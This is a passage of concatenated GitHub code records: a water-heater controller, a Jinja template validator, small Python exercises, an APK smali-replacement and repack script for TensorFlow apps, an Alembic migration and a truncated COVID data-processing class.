118 and state == 0:\n        GPIO.output(HEPIN, GPIO.HIGH)\n        state = 1\n        print('Temperature is below 118 degrees - turning on heating element.')\n\n    #Log data every 10 minutes\n    if now.minute % 10 == 0 and now.second == 0:\n        new_row = new_row + str(now.hour) + ':' + str(now.minute) + ',' + str(temp)\n        data = open('Waterheater_Data.csv', 'a')\n        data.write(new_row + '\\n')\n        data.close() #close the file so the buffered row is flushed before animate() reads it\n        print('Logging data: %.2f degrees Fahrenheit at %g:%g' % (temp,now.hour,now.minute))\n        sleep(1)\n    \n    #Draw water at the start of each hour\n    for i in range(len(hours)):\n        if hours[i] == now.hour and now.minute == 0 and now.second < 2:\n            draw_water(gallons[i]) #Draw scheduled volume for current hour\n            sleep(2) #Wait two seconds to prevent draw_water call from repeating\n\n    ani = animation.FuncAnimation(fig,animate, interval=1000)\n    plt.ion()\n    plt.show()\n","repo_name":"clarke6/LeightonScratch","sub_path":"WH_Controller_Animated.py","file_name":"WH_Controller_Animated.py","file_ext":"py","file_size_in_byte":4630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"20000766827","text":"import os\nfrom typing import Any, Iterator\n\nfrom jinja2 import Environment, meta\n\nfrom ..util.logger import logger\nfrom .jinja_env import get_jinja_env\nfrom .template_data import TemplateDataLoader\n\nVERSION_KEY = \"version\"\n\n\ndef validate_template_data(\n    templates_dir: str, template_name: str, data_loader: TemplateDataLoader\n) -> None:\n    \"\"\"\n    Check if the environment is correct to build the template\n    \"\"\"\n    env = get_jinja_env(\n        templates_dir=templates_dir, template_data=data_loader.data(with_escaped=True)\n    )\n\n    if VERSION_KEY in data_loader.data():\n        undeclared_variables = set()\n    else:\n        undeclared_variables = set([VERSION_KEY])\n\n    for parsedTemplate in __templates_generator(env, template_name):\n        undeclared_variables.update(meta.find_undeclared_variables(parsedTemplate))\n\n    if undeclared_variables:\n        raise ValueError(f\"Some environment variables are undeclared -> {undeclared_variables}\")\n\n\ndef __templates_generator(env: Environment, template_name: str) -> Iterator[Any]:\n    \"\"\"\n    Iterate over template and subtemplates\n    \"\"\"\n    templates_dir = env.loader.searchpath[0]\n\n    # Load template string\n    template_string = __load_file(file_path=os.path.join(templates_dir, template_name))\n\n    parsed_template = env.parse(template_string)\n    yield parsed_template\n\n    for subtemplate_name in meta.find_referenced_templates(parsed_template):\n        yield from __templates_generator(env, subtemplate_name)\n\n\ndef 
__load_file(file_path: str) -> str:\n    \"\"\"Load a file in memory\n    Args:\n        file_path ([str]): [path on the filesystem to the file]\n\n    Returns:\n        [str]: [content]\n    \"\"\"\n    content = str()\n    try:\n        with open(file_path, \"r\", encoding=\"utf-8\") as file:\n            content = file.read()\n    except FileNotFoundError as f_not_found_err:\n        logger.error(\"File %s not found. Aborting\", file_path)\n        raise FileNotFoundError from f_not_found_err\n    except OSError as os_err:\n        logger.error(\"OS error occurred trying to open %s\", file_path)\n        raise OSError from os_err\n    except Exception as err:\n        logger.error(\"Unexpected error opening %s\", file_path)\n        raise err\n    return content\n","repo_name":"meero-com/pre-commit-hooks","sub_path":"pre_commit_hooks/render_jinja_template_lib/data_validation.py","file_name":"data_validation.py","file_ext":"py","file_size_in_byte":2224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"37648907324","text":"# AIRBNB\n\"\"\"\n    SOLVED -- NO SIMILAR PROBLEM FOUND\n    Given a phone number, return all valid words \n    that can be created using that phone number.\n    For instance, given the phone number 364\n    we can construct the words ['dog', 'fog'].\n\"\"\"\n\nlettersMaps = {\n    1: [],\n    2: ['a', 'b', 'c'],\n    3: ['d', 'e', 'f'],\n    4: ['g', 'h', 'i'],\n    5: ['j', 'k', 'l'],\n    6: ['m', 'n', 'o'],\n    7: ['p', 'q', 'r', 's'],\n    8: ['t', 'u', 'v'],\n    9: ['w', 'x', 'y', 'z'],\n    0: []\n}\n\nvalidWords = ['dog', 'fish', 'cat', 'fog']\n\n# if validWords changes frequently (is not the same for many phones),\n# the brute force approach is better. For q queries [Time: O(q*n*m) Space: O(1)]\n# otherwise,\n# we can process all validWords once and create a segment tree\n# [Time: O(n*m) Space: O(n*m)] For q queries [Time: O(q*m) Space: O(1)]\n\n\ndef makeWords_brute(phone):\n    sol = []\n    for w in validWords:\n        if len(w) == len(phone):\n            i = 0\n            while i < len(w):\n                if w[i] not in lettersMaps[int(phone[i])]:\n                    break\n                i += 1\n            if i == len(w):\n                sol.append(w)\n    return sol\n\n\nprint(makeWords_brute('364'))\n# ['dog', 'fog']\n","repo_name":"SuchismitaDhal/Solutions-dailyInterviewPro","sub_path":"2020/07-July/07.21.py","file_name":"07.21.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
{"seq_id":"36350506289","text":"\"\"\"\nCreated on Dec 20, 2015\n\n@author: sohara\n\"\"\"\nimport shapely.geometry as sg\nimport pyvision3 as pv3\n\n\ndef annotation_demo():\n    \"\"\"\n    Demonstrates several annotation methods of the Image class\n    \"\"\"\n    img = pv3.Image(pv3.IMG_DRIVEWAY, desc=\"Annotations Demo\") # load a sample image\n\n    # annotate a point as a small filled circle\n    img.annotate_point((250, 250), color=pv3.RGB_BLACK)\n    img.annotate_point((300, 300)) # default color is red\n\n    # annotate text next to the brown point, blue on white background\n    img.annotate_text(\n        \"Waldo was here\", (254, 246), color=pv3.RGB_BLUE, bg_color=pv3.RGB_WHITE\n    )\n\n    # complex polygon with an exterior and an interior 'hole'\n    exterior = ((50, 50), (25, 125), (50, 200), (200, 200), (200, 50), (50, 50))\n    interior = ((100, 100), (100, 150), (150, 150), (175, 125), (150, 100), (100, 100))\n    poly = sg.Polygon(exterior, [interior])\n    img.annotate_shape(poly, color=pv3.RGB_CYAN, fill_color=pv3.RGB_GREEN, thickness=2)\n\n    # two concentric circles\n    img.annotate_circle((400, 400), 75, color=pv3.RGB_PURPLE, thickness=5)\n    img.annotate_circle(\n        (400, 400), 60, color=pv3.RGB_PURPLE, 
thickness=-1\n    ) # filled circle\n\n    # a LineString\n    lines = sg.LineString(((10, 25), (382, 122), (251, 470)))\n    img.annotate_shape(lines, thickness=4, color=pv3.RGB_RED)\n\n    # a Rectangle\n    img.annotate_rect(\n        (538, 212), (600, 300), color=pv3.RGB_ORANGE, thickness=3\n    ) # -1 for filled\n\n    # show the image with annotations\n    # NOTE: to NOT show the annotations, set annotations=False in the following\n    # img.show_annotation(window_title=\"Mask Layer\", highgui=True, delay=1)\n    img.show(\n        window_title=\"Annotated Image\", highgui=True, delay=0, annotations_opacity=0.5\n    )\n\n\nif __name__ == \"__main__\":\n    print(\"====================================================\")\n    print(\"Set focus to display window and hit any key to exit.\")\n    print(\"====================================================\")\n    annotation_demo()\n","repo_name":"svohara/pyvision3","sub_path":"examples/annotate_an_image.py","file_name":"annotate_an_image.py","file_ext":"py","file_size_in_byte":2040,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"}
{"seq_id":"27252918219","text":"people = 30\ncats = 100\ndogs = 45\n\n\nif people < cats:\n    print(\"Too many cats! The world is doomed!\")\n\nif people > cats:\n    print(\"Not many cats! The world is saved!\")\n\nif people < dogs:\n    print(\"The world is drooled on!\")\n\nif people > dogs:\n    print(\"The world is dry!\")\n\n\ndogs += 5\n\nif people >= dogs:\n    print(\"People are greater than or equal to dogs.\")\n\nif people <= dogs:\n    print(\"People are less than or equal to dogs.\")\n\n\nif people == dogs:\n    print(\"People are dogs.\")\n\nif True:\n    print(\"test\")\n\n\n\"\"\"\nStudy Drills\n\n\n1. What do you think the if does to the code under it?\nIt basically tells Python to read what each variable means and act based on the response.\n\n2. To show that it belongs to that block of code.\n\n3. It won't work. IndentationError.\n\n4. Yes.\n\n5. The answers will change.\n\n\"\"\"\n","repo_name":"sk610/Learn-Python-3-The-Hard-Way","sub_path":"Exercises/21-30/ex29.py","file_name":"ex29.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"24067204928","text":"#!/usr/bin/python3\ndef weight_average(my_list=[]):\n    total_vw, total_w, weighted_mean = 0, 0, 0\n    if my_list is None or len(my_list) == 0:\n        return 0\n    else:\n        for duo in my_list:\n            value, weight = duo\n            vw = value * weight\n            total_vw += vw\n            total_w += weight\n        weighted_mean = total_vw / total_w\n    return weighted_mean\n","repo_name":"awolcat/alx-higher_level_programming","sub_path":"0x04-python-more_data_structures/100-weight_average.py","file_name":"100-weight_average.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"26954661781","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Program Structure - Part II\n# \n# Up until this point, everything we have presented is true for\n# practically any programming language. They all have a branching\n# structure, and a looping structure. They all deal with boolean\n# variables, and have some form of function or subroutine structure to\n# break up problems into smaller pieces. Now we add lists and dictionaries\n# to the mix, and really add a lot of power to our programs.\n\n# ## Lists\n# \n# Python supports lists as a basic data structure. 
For example, you can do\n\n# In[8]:\n\n\na=[-4,4,10,-2,20]\nprint(a)\n\n\n# In[2]:\n\n\na[3]\n\n\n# In[3]:\n\n\na[0]\n\n\n# In[4]:\n\n\na[5]\n\n\n# Notice that you can access the elements of a list like `a[2]`, and that\n# the elements are numbered starting with **0**, not 1. If you try to\n# access beyond the length of a list, then an error results.\n# \n# When using the multiply operator, `*`, the list gets duplicated. For\n# example,\n\n# In[9]:\n\n\na=[1]*5\nprint(a)\n\n\n# The length of a list is given by the function `len`. This lets you cycle\n# through the values of a list easily.\n\n# In[11]:\n\n\na=[-4,4,10,-2,20]\nfor i in range(len(a)):\n if a[i]>0:\n print(\"The element number \",i,\" is greater than zero\")\n\n\n# The `for-loop` can more easily be used to loop through the values of the list, rather than looping through the index numbers,\n\n# In[12]:\n\n\na=[-4,4,10,-2,20]\nfor value in a:\n if value>0:\n print(\"The value \",value,\" is greater than zero\")\n\n\n# ### A Warning about Copying Lists\n# \n\n# In the way that Python works, if you do:\n\n# In[13]:\n\n\na=[1,2,3,4,5]\nb=a\n\n\n# Then `b` is not a copy of `a`, but the **same list** as `a`. Modifying\n# `b` also modifies `a`, for example\n\n# In[14]:\n\n\na\n\n\n# In[15]:\n\n\nb\n\n\n# In[16]:\n\n\nb[2]=100\n\n\n# In[17]:\n\n\nb\n\n\n# In[18]:\n\n\na\n\n\n# To avoid this, do the following\n\n# In[20]:\n\n\na=[1,2,3,4,5]\n\n\n# In[21]:\n\n\nb=a[:] # make a copy of a\n\n\n# In[22]:\n\n\na\n\n\n# In[23]:\n\n\nb\n\n\n# In[24]:\n\n\nb[2]=100\n\n\n# In[25]:\n\n\na\n\n\n# In[26]:\n\n\nb\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"bblais/AI-and-Robotics-Fall-2023-Class-Notebooks","sub_path":"Programming Manual/04.01 Program Structure - Part II.py","file_name":"04.01 Program Structure - Part II.py","file_ext":"py","file_size_in_byte":2000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24458901136","text":"# coding=utf-8\r\nimport os\r\nfrom shutil import copyfile,copytree\r\nfrom basic_func import run_cmd\r\n\r\ntemplates = [\"templates\\\\TensorFlowInferenceInterface.smali\",\r\n \"templates\\\\a.smali\",\r\n \"templates\\\\types\\\\UInt8.smali\",\r\n \"templates\\\\Graph.smali\"]\r\n\r\ndef codereplace(replace_repack):\r\n cnt = 0\r\n obscure, notobscure = 0,0\r\n replaced = []\r\n for apkpath in replace_repack:\r\n dirs = os.listdir(apkpath)\r\n smalidir = []\r\n for d in dirs:\r\n if 'smali' in d:\r\n smalidir.append(d)\r\n flag = 0\r\n for s in smalidir:\r\n filepath = os.path.join(apkpath,s,\"org\\\\tensorflow\\contrib\\\\android\\\\\")\r\n if os.path.exists(filepath+\"TensorFlowInferenceInterface.smali\"):\r\n copyfile(templates[0],filepath+\"TensorFlowInferenceInterface.smali\")\r\n cnt+=1\r\n notobscure+=1\r\n if not(os.path.exists(os.path.join(apkpath,s,\"org\\\\tensorflow\\\\types\\\\UInt8.smali\"))):\r\n if not(os.path.exists(os.path.join(apkpath,s,\"org\\\\tensorflow\\\\types\"))):\r\n os.mkdir(os.path.join(apkpath,s,\"org\\\\tensorflow\\\\types\"))\r\n ftemp = open(os.path.join(apkpath,s,\"org\\\\tensorflow\\\\types\\\\UInt8.smali\"),\"w\")\r\n ftemp.close()\r\n copyfile(templates[2],os.path.join(apkpath,s,\"org\\\\tensorflow\\\\types\\\\UInt8.smali\"))\r\n flag = 1\r\n elif os.path.exists(filepath+\"a.smali\"):\r\n copyfile(templates[1],filepath+\"a.smali\")\r\n if os.path.exists(os.path.join(apkpath,s,\"org\\\\tensorflow\\Graph.smali\")):\r\n find = False\r\n with open(os.path.join(apkpath,s,\"org\\\\tensorflow\\Graph.smali\"),'r') as f:\r\n for line 
in f.readlines():\r\n if line.find(\"a([B)V\")>=0:\r\n find = True\r\n break\r\n if not find:\r\n copyfile(templates[3],os.path.join(apkpath,s,\"org\\\\tensorflow\\Graph.smali\"))\r\n cnt+=1\r\n obscure+=1\r\n flag = 1\r\n if flag==1:\r\n replaced.append(apkpath)\r\n return replaced\r\n\r\ndef repackandsign(apks,destpath,replaced):\r\n if not os.path.exists(destpath):\r\n os.mkdir(destpath)\r\n signed_path = os.path.join(destpath,'signed')\r\n if not os.path.exists(signed_path):\r\n os.mkdir(signed_path)\r\n apklist = os.listdir(apks)\r\n for apk in apklist:\r\n apkpath = os.path.join(apks,apk)\r\n if apkpath in replaced:\r\n signp = os.path.join(signed_path,apk)\r\n repackp = os.path.join(destpath,apk)\r\n cmd = 'java -jar apktool_2.4.1.jar b -o ' + repackp + '-repack.apk ' + apkpath\r\n print(\"begin to repack\")\r\n try:\r\n run_cmd(cmd)\r\n except:\r\n print('repack failed:'+apkpath)\r\n continue\r\n cmd = 'jarsigner -verbose -keystore test.keystore -storepass 123456 -signedjar '\\\r\n +signp+'-signed.apk '+ repackp + '-repack.apk test.keystore'\r\n print(\"begin to sign\")\r\n try:\r\n run_cmd(cmd)\r\n except:\r\n print('sign failed:'+apkpath)\r\n continue\r\n","repo_name":"MMGuard123/MMGuard","sub_path":"libreplace_repack.py","file_name":"libreplace_repack.py","file_ext":"py","file_size_in_byte":3381,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"71775277547","text":"\"\"\"Update BotCommand relationship\n\nRevision ID: f14c48e6d1d1\nRevises: 8055e81feb7b\nCreate Date: 2023-08-08 12:12:16.351328\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'f14c48e6d1d1'\ndown_revision = '8055e81feb7b'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table('servercommands', schema=None) as batch_op:\n batch_op.add_column(sa.Column('command_name', sa.String(), nullable=True))\n batch_op.add_column(sa.Column('command_description', sa.String(), nullable=True))\n batch_op.create_foreign_key(batch_op.f('fk_servercommands_command_description_botcommands'), 'botcommands', ['command_description'], ['description'])\n batch_op.create_foreign_key(batch_op.f('fk_servercommands_command_name_botcommands'), 'botcommands', ['command_name'], ['name'])\n\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n with op.batch_alter_table('servercommands', schema=None) as batch_op:\n batch_op.drop_constraint(batch_op.f('fk_servercommands_command_name_botcommands'), type_='foreignkey')\n batch_op.drop_constraint(batch_op.f('fk_servercommands_command_description_botcommands'), type_='foreignkey')\n batch_op.drop_column('command_description')\n batch_op.drop_column('command_name')\n\n # ### end Alembic commands ###\n","repo_name":"lzklein/final-project-wangusbot-client","sub_path":"server/migrations/versions/f14c48e6d1d1_update_botcommand_relationship.py","file_name":"f14c48e6d1d1_update_botcommand_relationship.py","file_ext":"py","file_size_in_byte":1496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22858326993","text":"import pandas as pd\nimport numpy as np\nimport json\nimport plotly\nimport os\n\nimport urllib.request\nfrom datetime import datetime\n\nfrom sklearn.preprocessing import StandardScaler\nfrom scipy.stats import chi2\nfrom numpy.linalg import inv\nimport plotly.graph_objs as go\nfrom functools import reduce\n\nclass CovidFr():\n \"\"\"\n docstring for CovidFr\n \"\"\"\n ### URL source for loading covid data\n synthesis_covid_url = 'https://www.data.gouv.fr/fr/datasets/r/63352e38-d353-4b54-bfd1-f1b3ee1cabd7'\n synthesis_dprate_url = 'https://www.data.gouv.fr/fr/datasets/r/19a91d64-3cd3-42fc-9943-d635491a4d76'\n synthesis_rprate_url = 'https://www.data.gouv.fr/fr/datasets/r/ad09241e-52fa-4be8-8298-e5760b43cae2'\n synthesis_nprate_url = 'https://www.data.gouv.fr/fr/datasets/r/57d44bd6-c9fd-424f-9a72-7834454f9e3c'\n\n def __init__(self):\n # Init basic departments data\n data_dir = os.path.realpath(os.path.dirname(__file__) + \"/../data/\")\n\n #self.department_base_data = pd.read_csv(data_dir + \"/departments.csv\")\n department_base_data = pd.read_csv(data_dir + \"/departments_rectif_pop.csv\")\n department_base_data.index = department_base_data['insee']\n self.department_base_data = department_base_data.sort_index()\n\n #self.region_base_data = pd.read_csv(data_dir + \"/regions.csv\", dtype={'insee': \"string\"})\n region_base_data = pd.read_csv(data_dir + \"/regions_rectif_pop.csv\", dtype={'insee': \"string\"})\n region_base_data.index = region_base_data['insee']\n self.region_base_data = region_base_data.sort_index()\n\n self.last_update = CovidFr.updatechecking(json_url=\"https://www.data.gouv.fr/datasets/5e7e104ace2080d9162b61d8/rdf.json\", data_request_url=CovidFr.synthesis_covid_url)\n #self.last_update = \"\"\n\n self.features = [\"rad\", \"dc\", \"hosp\", \"rea\"]\n\n self.positive_last_update = CovidFr.updatechecking(json_url=\"https://www.data.gouv.fr/datasets/5ed1175ca00bbe1e4941a46a/rdf.json\", data_request_url=CovidFr.synthesis_dprate_url)\n #self.positive_last_update = \"\"\n \n ###############################\n # required process settings\n ###############################\n self.number_all_dep = list(range(1, self.department_base_data.shape[0]+1))\n self.global_pc = list(range(1, len(self.features)+1))\n self.normalize_states = [True, False]\n self.alpha_smooth = list(np.arange(0.1, 1, 0.05).round(2))\n self.pc_reg = list(range(1, self.region_base_data.shape[0]+1))\n ##############################\n # independent default settings\n ##############################\n ## default selected number of top departments\n self.default_top_dep = 10\n #-- default settings for pca-based global monitoring\n self.default_pcdim = 2\n self.default_normalize = self.normalize_states[0]\n self.default_start_d_learn_fr = 
'15/05/2020'\n self.default_end_d_learn_fr = '25/08/2020'\n self.default_alpha = 0.6\n #-- default settings for pca-based region hospitalization monitoring\n self.default_pcdim_reg = 3\n self.default_normalize_reg = self.normalize_states[0]\n self.default_start_d_learn_fr_reg = '15/05/2020'\n self.default_end_d_learn_fr_reg = '25/08/2020'\n self.default_alpha_reg = 0.7\n #-- other default settings\n self.default_department = None\n self.default_region = None\n\n def load_df(self):\n \"\"\"\n Loading dataframes\n \"\"\"\n usecols = [\"dep\", \"sexe\", \"jour\", \"hosp\", \"rea\", \"rad\", \"dc\"]\n covid = pd.read_csv(CovidFr.synthesis_covid_url, sep=';', usecols=usecols).dropna()\n covid['jour'] = pd.to_datetime(covid['jour'])\n covid = covid.drop_duplicates()\n\n covid = covid.loc[covid['dep'].isin(self.department_base_data.insee.values)]\n\n self.covid = CovidFr.regionadd(data=covid)\n\n self.first_day_fr = self.covid.jour.min().strftime(\"%d/%m/%Y\")\n\n self.last_day_fr = self.covid.jour.max().strftime(\"%d/%m/%Y\")\n\n self.last_day = self.covid.jour.max().strftime(\"%Y-%m-%d\")\n\n return self.covid \n \n def load_positive_df(self):\n \"\"\"\n Loading dataframes\n \"\"\"\n #national df\n nprate = pd.read_csv(CovidFr.synthesis_nprate_url, sep=';', usecols=['jour', 'P', 'cl_age90']).dropna()\n nprate['jour'] = pd.to_datetime(nprate['jour'])\n self.nprate = nprate.drop_duplicates()\n\n #regional df\n rprate = pd.read_csv(CovidFr.synthesis_rprate_url, sep=';', dtype={'reg': \"string\"}, usecols=['reg', 'jour', 'P', 'cl_age90']).dropna()\n rprate['jour'] = pd.to_datetime(rprate['jour'])\n rprate = rprate.drop_duplicates()\n self.rprate = rprate.loc[rprate['reg'].isin(list(self.region_base_data.index))]\n\n #departmental df\n dprate = pd.read_csv(CovidFr.synthesis_dprate_url, sep=';', dtype={'dep': \"string\"}, usecols=['dep', 'jour', 'P', 'cl_age90']).dropna()\n dprate['jour'] = pd.to_datetime(dprate['jour'])\n dprate = dprate.drop_duplicates()\n self.dprate = dprate.loc[dprate['dep'].isin(list(self.department_base_data.index))]\n\n #other parameters\n self.positive_last_day = self.dprate.jour.max().strftime(\"%Y-%m-%d\")\n self.positive_last_day_fr = self.dprate.jour.max().strftime(\"%d/%m/%Y\")\n \n ###############################\n # required process settings\n ###############################\n self.map_choice = [\"Nombre de guérisons\", \"Nombre de décès\", \"Taux décès / (décès + guérisons)\", \"Nombre d'hospitalisations le \"+self.last_day_fr, \"Nombre de réanimations le \"+self.last_day_fr, \"Nombre de cas positifs le \"+self.positive_last_day_fr]\n self.criterion_choice = [\"Cas positifs au \"+self.positive_last_day_fr, \"Hospitalisations au \"+self.last_day_fr, \"Réanimations au \"+self.last_day_fr]\n self.default_map_select = self.map_choice[5]\n self.default_criterion_select = self.criterion_choice[0]\n\n return self.nprate, self.rprate, self.dprate\n\n def covid_need_update(self):\n \"\"\"Check the last update of the datasets on data.gouv.fr and tells whether we need to refresh the data or not\n Returns:\n True if the data need to be updated, False instead\n \"\"\"\n with urllib.request.urlopen(\"https://www.data.gouv.fr/datasets/5e7e104ace2080d9162b61d8/rdf.json\") as url:\n data = json.loads(url.read().decode())\n #data = json.loads(data)\n for dataset in data['@graph']:\n if 'accessURL' in dataset.keys() and dataset['accessURL'] == CovidFr.synthesis_covid_url:\n if self.last_update == \"\" or self.last_update < dataset['modified']:\n return True\n return False\n\n def 
positive_need_update(self):\n \"\"\"Check the last update of the datasets on data.gouv.fr and tells whether we need to refresh the data or not\n Returns:\n True if the data need to be updated, False instead\n \"\"\"\n with urllib.request.urlopen(\"https://www.data.gouv.fr/datasets/5ed1175ca00bbe1e4941a46a/rdf.json\") as url:\n data = json.loads(url.read().decode())\n #data = json.loads(data)\n for dataset in data['@graph']:\n if 'accessURL' in dataset.keys() and dataset['accessURL'] == CovidFr.synthesis_dprate_url:\n if self.positive_last_update == \"\" or self.positive_last_update < dataset['modified']:\n return True\n return False\n\n def map_covid_reg(self, data=None):\n \"\"\"\n Get data from regions as a JSON string along with quantiles\n Returns:\n JSON string of regions overall data\n \"\"\"\n if data is None:\n reg_data = self.covid[(self.covid['sexe'] == 0)]\n else:\n reg_data = data[(data['sexe'] == 0)]\n\n nat_data = reg_data.copy()\n nat_data = nat_data.groupby(\"jour\").sum()\n\n reg_data = reg_data \\\n .drop(['jour', 'sexe'], axis=1) \\\n .groupby(['reg','dep']) \\\n .max() \\\n .groupby('reg') \\\n .sum()\n\n reg_data = pd.concat([reg_data, self.region_base_data], axis=1)\n\n overall_reg_data_as_json_dict = {}\n\n features = self.features.copy()\n features.append(\"r_dc_rad\")\n for feature in features: \n if feature == \"dc\" or feature == \"rad\":\n ### For death and or rad case maps\n reg_data[feature+'_par_habitants'] = (reg_data[feature] / reg_data['population']) * 100000\n\n data_feature = reg_data.copy()\n \n data_feature = data_feature.set_index(\"region-\" + data_feature.index)\n \n data_feature = data_feature.loc[:, ['label', feature, feature+'_par_habitants', 'insee']]\n\n q_feature = np.mean(data_feature[feature+'_par_habitants'].to_numpy() \\\n <= ((nat_data.at[self.last_day, feature] / self.region_base_data[\"population\"].sum()) * 100000))\n\n q_feature_list = [0.1, 0.1+(q_feature-0.1)/2, q_feature, q_feature+(.949-q_feature)/2, .949]\n \n quantiles_feature = data_feature[feature+'_par_habitants'] \\\n .quantile(q_feature_list) \\\n .round(2)\n\n data_feature[feature+'_par_habitants'] = data_feature[feature+'_par_habitants'].round(2)\n\n #setattr(self, 'overall_regions_{}'.format(feature)+\"_as_json\", {\"data_\"+feature: data_feature.to_json(orient='index'), \"quantiles_\"+feature: quantiles_feature.to_json(orient='index')})\n\n overall_reg_data_as_json_dict.update({'overall_regions_{}'.format(feature)+\"_as_json\": {\"data_\"+feature: data_feature.to_json(orient='index'), \"quantiles_\"+feature: quantiles_feature.to_json(orient='index')}})\n \n elif feature == \"r_dc_rad\":\n ### For rate death case map\n reg_data[feature] = (reg_data['dc'] / (reg_data['dc'] + reg_data['rad']))\n \n data_feature = reg_data.copy()\n\n data_feature = data_feature.set_index(\"region-\" + data_feature.index)\n\n data_feature = data_feature.loc[:, ['label', 'dc', 'rad', feature, 'insee']]\n\n q_feature = np.mean(reg_data[feature].to_numpy() <= (data_feature['dc'].sum() / (data_feature['dc'].sum() + data_feature['rad'].sum())))\n\n q_feature_list = [0.1, 0.1+(q_feature-0.1)/2, q_feature, q_feature+2*(.979-q_feature)/3, .979]\n\n quantiles_feature = data_feature[feature] \\\n .quantile(q_feature_list) \\\n .round(2)\n\n data_feature[feature] = data_feature[feature].round(2)\n\n #setattr(self, 'overall_regions_{}'.format(feature)+\"_as_json\", {\"data_\"+feature: data_feature.to_json(orient='index'), \"quantiles_\"+feature: quantiles_feature.to_json(orient='index')})\n\n 
overall_reg_data_as_json_dict.update({'overall_regions_{}'.format(feature)+\"_as_json\": {\"data_\"+feature: data_feature.to_json(orient='index'), \"quantiles_\"+feature: quantiles_feature.to_json(orient='index')}})\n\n elif feature == \"hosp\" or feature == \"rea\":\n ### For hosp and or rea case map\n reg_data_j = self.covid[(self.covid['sexe'] == 0) & (self.covid['jour'] == self.last_day)]\n \n reg_data_j = reg_data_j \\\n .drop(['dep', 'jour', 'sexe'], axis=1) \\\n .groupby('reg') \\\n .sum()\n\n reg_data_j = pd.concat([reg_data_j, self.region_base_data], axis=1)\n\n reg_data_j[feature+'_par_habitants'] = (reg_data_j[feature] / reg_data_j['population']) * 100000\n \n data_feature = reg_data_j.copy()\n \n data_feature = data_feature.set_index(\"region-\" + data_feature.index)\n \n data_feature = data_feature.loc[:, ['label', feature, feature+'_par_habitants', 'insee']]\n\n q_feature = np.mean(data_feature[feature+'_par_habitants'].to_numpy() \\\n <= ((nat_data.at[self.last_day, feature] / self.region_base_data[\"population\"].sum()) * 100000))\n\n q_feature_list = [0.1, 0.1+(q_feature-0.1)/2, q_feature, q_feature+(.949-q_feature)/2, .949]\n\n quantiles_feature = data_feature[feature+'_par_habitants'] \\\n .quantile(q_feature_list) \\\n .round(2)\n\n data_feature[feature+'_par_habitants'] = data_feature[feature+'_par_habitants'].round(2)\n\n #setattr(self, 'overall_regions_{}'.format(feature)+\"_as_json\", {\"data_\"+feature: data_feature.to_json(orient='index'), \"quantiles_\"+feature: quantiles_feature.to_json(orient='index')})\n\n overall_reg_data_as_json_dict.update({'overall_regions_{}'.format(feature)+\"_as_json\": {\"data_\"+feature: data_feature.to_json(orient='index'), \"quantiles_\"+feature: quantiles_feature.to_json(orient='index')}})\n\n return overall_reg_data_as_json_dict\n\n def map_covid_dep(self, data=None):\n \"\"\"\n Get data from departments as a JSON string along with quantiles\n Returns:\n JSON string of departments overall data\n \"\"\"\n if data is None:\n dep_data = self.covid[(self.covid['sexe'] == 0)]\n else:\n dep_data = data[(data['sexe'] == 0)]\n\n nat_data = dep_data.copy()\n nat_data = nat_data.groupby(\"jour\").sum()\n\n dep_data = dep_data \\\n .drop(['reg', 'jour', 'sexe'], axis=1) \\\n .groupby('dep') \\\n .max()\n\n dep_data = pd.concat([dep_data, self.department_base_data], axis=1)\n\n overall_dep_data_as_json_dict = {}\n\n features = self.features.copy()\n features.append(\"r_dc_rad\")\n for feature in features: \n if feature == \"dc\" or feature == \"rad\":\n ### For death and or rad case maps\n dep_data[feature+'_par_habitants'] = (dep_data[feature] / dep_data['population']) * 100000\n\n data_feature = dep_data.copy()\n \n data_feature = data_feature.set_index(\"department-\" + data_feature.index)\n \n data_feature = data_feature.loc[:, ['label', feature, feature+'_par_habitants', 'insee']]\n\n q_feature = np.mean(data_feature[feature+'_par_habitants'].to_numpy() \\\n <= ((nat_data.at[self.last_day, feature] / self.department_base_data[\"population\"].sum()) * 100000))\n\n q_feature_list = [0.1, 0.1+(q_feature-0.1)/2, q_feature, q_feature+(.949-q_feature)/2, .949]\n \n quantiles_feature = data_feature[feature+'_par_habitants'] \\\n .quantile(q_feature_list) \\\n .round(2)\n\n data_feature[feature+'_par_habitants'] = data_feature[feature+'_par_habitants'].round(2)\n\n #setattr(self, 'overall_departments_{}'.format(feature)+\"_as_json\", {\"data_\"+feature: data_feature.to_json(orient='index'), \"quantiles_\"+feature: 
